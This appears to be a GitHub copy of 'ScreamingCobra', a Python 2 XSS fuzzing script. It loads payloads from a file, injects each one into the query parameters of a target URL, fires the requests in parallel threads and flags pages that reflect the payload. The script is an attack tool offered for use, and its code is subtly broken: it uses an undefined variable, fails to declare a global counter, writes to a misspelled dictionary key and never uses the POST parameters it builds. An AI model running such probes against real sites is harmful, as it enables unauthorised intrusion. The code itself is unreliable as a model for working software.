forked from HackerUniverse/ScreamingCobra
-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathScreamingCobra_anti-ids_post1.py
145 lines (119 loc) · 6.53 KB
/
ScreamingCobra_anti-ids_post1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
#!/usr/bin/env python
# coding: latin-1
# -*- coding: utf-8 -*-
# coding: utf-8
# coding: UTF-8
# coding: UTF-16
# coding: utf-16
# Imports
import html, sys, httplib2, re, requests, urllib2, urlparse, json, time, httplib, cookielib, urllib, httplib, urllib, socket, urlparse, os, sys, time, mechanize
from threadpool import *
from termcolor import colored
# Clear system terminal
os.system("clear")
# Banner art; despite the variable name it contains non-ASCII box-drawing
# characters, decoded as UTF-8 just before being printed below.
none_ascii = '''
███████╗ ██████╗██████╗ ███████╗ █████╗ ███╗ ███╗██╗███╗ ██╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ █████╗
██╔════╝██╔════╝██╔══██╗██╔════╝██╔══██╗████╗ ████║██║████╗ ██║██╔════╝ ██╔════╝██╔═══██╗██╔══██╗██╔══██╗██╔══██╗
███████╗██║ ██████╔╝█████╗ ███████║██╔████╔██║██║██╔██╗ ██║██║ ███╗ ██║ ██║ ██║██████╔╝██████╔╝███████║
╚════██║██║ ██╔══██╗██╔══╝ ██╔══██║██║╚██╔╝██║██║██║╚██╗██║██║ ██║ ██║ ██║ ██║██╔══██╗██╔══██╗██╔══██║
███████║╚██████╗██║ ██║███████╗██║ ██║██║ ╚═╝ ██║██║██║ ╚████║╚██████╔╝ ╚██████╗╚██████╔╝██████╔╝██║ ██║██║ ██║
╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝
XSS Fuzz Swiss Knife, version 1.0'''
print "" # Information
print colored('[ Coder ]', 'red'), colored(' Haroon Awan', 'white')
print colored('[ Programmer ]', 'red'), colored(' Shadab Siddique', 'white')
print colored('[ Contact ] ', 'red'), colored('[email protected]', 'white')
print colored('[ Instagram ] ', 'red'), colored('hackeruniversee, hackerfromscratch', 'white')
print colored('[ Facebook ] ', 'red'), colored('Https://www.facebook.com/officialharoonawan', 'white')
print colored('[ Github ] ', 'red'), colored('Https://www.github.com/haroonawanofficial', 'white')
print(none_ascii.decode('utf-8'))
# Target
print colored('[+] ', 'red'), colored('Target Settings', 'white')
# Configurations
DEBUG = True  # NOTE(review): appears unread -- the final timing print tests intt, not DEBUG (see commented-out line near end of file)
MAX_THREAD_COUNT = 10  # worker count handed to ThreadPool in __main__
PAYLOADS_FILENAME = 'upperpayload'  # payload list file, one XSS payload per line
SCHEME_DELIMITER = '://'  # joins scheme and netloc when rebuilding the base URL
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  # NOTE(review): built but never installed or used -- attack() calls urllib2.urlopen directly, so cookies are not actually carried
intt=0  # module-level counter of completed requests, incremented in attack()
# Define attack routine
def attack(url, payload):
t_start = time.time()
return_dict = dict()
return_dict['url'] = url
return_dict['vulnerability'] = False
try:
return_dict['method'] = 'POST'
XSS_RESPONSE=payload
attack= urllib2.urlopen(url).read()
index = attack.find(XSS_RESPONSE)
buffer = 20
print_url=url.replace("<","<").replace(">",">")
attack = attack.split("\n");
len(attack)
if index != -1:
return_dict[' vulnerability'] = True
print colored('[-] ', 'red'), colored('Found XSS', 'white'), print_url
return_dict['vulnerability_data'] = line.strip()
intt=intt+1
print intt
else:
return_dict['vulnerability'] = False
print colored('[-] ', 'red'), colored('Not Vulernerable', 'white'), print_url
return_dict['vulnerability_data'] = line.strip()
intt=intt+1
print intt
t_end = time.time()
return_dict['time'] = round((t_end - t_start), 2)
except KeyboardInterrupt, ke:
sys.exit(0)
except Exception, e:
return_dict['exception'] = str(e)
if __name__ == '__main__':
# Init
t_global_start = time.time()
payloads_file = open(PAYLOADS_FILENAME)
threadpool = ThreadPool(MAX_THREAD_COUNT)
print colored('[+] ', 'red'), colored('Enter Absolute Parameter, URI, URL:', 'green')
sites = str(raw_input("[-] "))
print colored('[+] ', 'red'), colored('Loaded Parallel Engine', 'green')
print colored('[+] ', 'red'), colored('Loaded Payloads', 'green')
print colored('[+] ', 'red'), colored('Performing XSS Tests', 'green')
payloads = []
for payload in payloads_file:
payloads.append(payload[:-1])
# Extract Base URL and Parameters from site
parse_url = urlparse.urlparse(sites)
base_url = '%s%s%s%s' % (parse_url.scheme, SCHEME_DELIMITER, parse_url.netloc, parse_url.path)
#print base_url
param_parse_list = urlparse.urlparse(sites)[4].split(' ')
param_dict = dict()
for param_parse_entry in param_parse_list:
tmp = param_parse_entry.split(' ')
param_dict[tmp[0]] = tmp[0]
# Loop through payloads
for payload in payloads:
# Loop through parameters
for k1, v1 in iter(sorted(param_dict.iteritems())):
# Build GET param string and POST param dict
get_params = ''
post_params = dict()
for k2, v2 in iter(sorted(param_dict.iteritems())):
if k1 == k2:
get_params += '%s%s&' % (k2, payload)
post_params[k2] = payload
else:
get_params += '%s%s&' % (k2, v2)
post_params[k2] = v2
get_params = get_params[:-1]
# Enqueue GET attack
get_attack_url = '%s?%s' % (base_url, get_params)
threadpool.enqueue(attack, get_attack_url, payload)
# Wait for threadpool
threadpool.wait()
# Exit
t_global_end = time.time()
#if DEBUG:
if(intt == 0):
print colored('[!] ', 'red'), colored('Time taken for parallel scan : %.2f seconds', 'green') % (t_global_end - t_global_start)